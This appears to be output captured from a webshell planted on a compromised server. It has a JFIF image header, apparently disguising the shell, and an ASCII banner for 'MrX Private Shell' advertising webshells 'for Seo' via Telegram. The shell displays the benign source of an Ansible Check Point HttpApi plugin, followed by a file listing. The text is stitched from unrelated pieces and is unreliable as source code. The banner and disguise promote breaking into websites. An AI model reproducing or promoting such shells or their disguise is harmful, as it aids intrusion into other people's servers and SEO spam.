����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# (c) 2018 Red Hat Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
# Plugin documentation in YAML form. The nesting is significant: each entry
# under ``options`` must contain its own ``type``/``description``/``vars`` keys.
DOCUMENTATION = """
---
author: Ansible Networking Team (@rcarrillocruz)
name: checkpoint
short_description: HttpApi Plugin for Checkpoint devices
description:
  - This HttpApi plugin provides methods to connect to Checkpoint
    devices over a HTTP(S)-based api.
version_added: "2.8.0"
options:
  domain:
    type: str
    description:
      - Specifies the domain of the Check Point device
    vars:
      - name: ansible_checkpoint_domain
  api_key:
    type: str
    description:
      - Login with api-key instead of user & password
    vars:
      - name: ansible_api_key
  cloud_mgmt_id:
    type: str
    description:
      - The Cloud Management ID
    vars:
      - name: ansible_cloud_mgmt_id
"""
import json
from ansible.module_utils.basic import to_text
from ansible.errors import AnsibleConnectionFailure
from ansible.module_utils.six.moves.urllib.error import HTTPError
from ansible.plugins.httpapi import HttpApiBase
from ansible.module_utils.connection import ConnectionError
# Headers passed with every request issued through send_request().
BASE_HEADERS = {
    "Content-Type": "application/json",
    "User-Agent": "Ansible",
}
class HttpApi(HttpApiBase):
    """HttpApi plugin implementation for the Check Point web API.

    Every request is sent as a JSON ``POST`` through ``self.connection``.
    ``login`` stores the session token on the connection as the
    ``X-chkp-sid`` header value.
    """

    def login(self, username, password):
        """Authenticate against ``/web_api/login`` and store the session id.

        Either ``username`` and ``password`` are used, or the ``api_key``
        plugin option, but not a mix of both. The ``domain`` option is added
        to the payload when it is set.

        :raises AnsibleConnectionFailure: when neither a complete
            username/password pair nor an api key alone was supplied.
        :raises ConnectionError: when the login response carries no ``sid``.
        """
        payload = {}
        cp_domain = self.get_option('domain')
        cp_api_key = self.get_option('api_key')
        if cp_domain:
            payload['domain'] = cp_domain
        if username and password and not cp_api_key:
            payload['user'] = username
            payload['password'] = password
        elif cp_api_key and not username and not password:
            payload['api-key'] = cp_api_key
        else:
            raise AnsibleConnectionFailure('[Username and password] or api_key are required for login')

        url = '/web_api/login'
        response, response_data = self.send_request(url, payload)

        try:
            self.connection._auth = {'X-chkp-sid': response_data['sid']}
        except (KeyError, TypeError):
            # TypeError covers the case where send_request() returned a plain
            # message string (connection failure) rather than a JSON object.
            raise ConnectionError(
                'Server returned response without token info during connection authentication: %s' % response)

        # Case of read-only
        if 'uid' in response_data:
            self.connection._session_uid = response_data['uid']

    def logout(self):
        """Post an empty request to ``/web_api/logout``; the reply is ignored."""
        self.send_request('/web_api/logout', None)

    def get_session_uid(self):
        """Return the session uid that ``login`` stored on the connection."""
        return self.connection._session_uid

    def send_request(self, path, body_params):
        """POST ``body_params`` as JSON to ``path``.

        When the ``cloud_mgmt_id`` option is set, it is prepended to ``path``
        as an extra leading path segment.

        :param path: API path, e.g. ``/web_api/login``.
        :param body_params: JSON-serialisable payload; a falsy value sends ``{}``.
        :returns: ``(status_code, data)``. ``data`` is the decoded JSON body on
            success. On ``AnsibleConnectionFailure`` the result is
            ``(404, <exception message>)``. On ``HTTPError`` the result is
            ``(e.code, <decoded error body>)``, falling back to the raw body
            text when that body is not valid JSON.
        """
        data = json.dumps(body_params) if body_params else '{}'
        cp_cloud_mgmt_id = self.get_option('cloud_mgmt_id')
        if cp_cloud_mgmt_id:
            path = '/' + cp_cloud_mgmt_id + path

        try:
            self._display_request()
            response, response_data = self.connection.send(path, data, method='POST', headers=BASE_HEADERS)
            value = self._get_response_value(response_data)
            return response.getcode(), self._response_to_json(value)
        except AnsibleConnectionFailure as e:
            return 404, e.message
        except HTTPError as e:
            error_text = to_text(e.read())
            try:
                error = json.loads(error_text)
            except ValueError:
                # The error body is not JSON; hand back the raw text so the
                # caller still receives the HTTP status code.
                error = error_text
            return e.code, error

    def _display_request(self):
        """Queue a ``vvvv``-level message naming the method and connection URL."""
        self.connection.queue_message('vvvv', 'Web Services: %s %s' % ('POST', self.connection._url))

    def _get_response_value(self, response_data):
        """Return the text content of the response buffer."""
        return to_text(response_data.getvalue())

    def _response_to_json(self, response_text):
        """Decode ``response_text`` as JSON; empty text yields ``{}``.

        :raises ConnectionError: when the text is not valid JSON.
        """
        try:
            return json.loads(response_text) if response_text else {}
        # JSONDecodeError only available on Python 3.5+
        except ValueError:
            raise ConnectionError('Invalid JSON response: %s' % response_text)
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| `__pycache__` | Folder | | 0755 | |
| checkpoint.py | File | 3.74 KB | 0644 | |